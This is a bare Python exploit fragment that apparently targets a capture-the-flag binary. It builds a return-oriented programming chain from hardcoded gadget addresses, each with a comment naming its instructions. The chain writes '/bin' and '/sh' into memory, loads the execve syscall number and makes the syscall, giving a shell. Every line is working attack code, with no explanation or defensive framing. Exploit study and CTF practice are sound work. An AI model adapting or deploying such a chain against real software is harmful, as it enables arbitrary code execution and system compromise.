payload = p64(0x4c5dc0)
#0x00000000004c5dc0: pop rdi; ret; 
payload += p64(0x4f8057)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x428ea7)
# 0x428ea7: add dword ptr [rdi + 1], ebp ; retf
payload += p32(0x4c5dc0)+p32(0x33)
# 0x00000000004c5dc0: pop rdi; ret; 
payload += p64(0x4f805b)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x428ea7)
# 0x428ea7: add dword ptr [rdi + 1], ebp ; retf
payload += p32(0x4aa32a)+p32(0x33)
# 0x00000000004aa32a: pop rsi; ret; 
payload += p64(0x4f81bf)+p64(0x47f26f)
# 0x47f26f: pop rdx ; sub ah, byte ptr [rsi - 0x3f] ; retf
payload += p64(0x0)+p32(0x4c5dc0)+p32(0x33)
# 0x00000000004c5dc0: pop rdi; ret; 
payload += p64(0x4f8058)+p64(0x4aa32a)
# 0x00000000004aa32a: pop rsi; ret; 
payload += p64(0x0)+p64(0x439358)
# 0x0000000000439358: pop rax; ret; 
payload += p64(0x3b)+p64(0x4227b0)
# 0x00000000004227b0: syscall; 
payload += b''
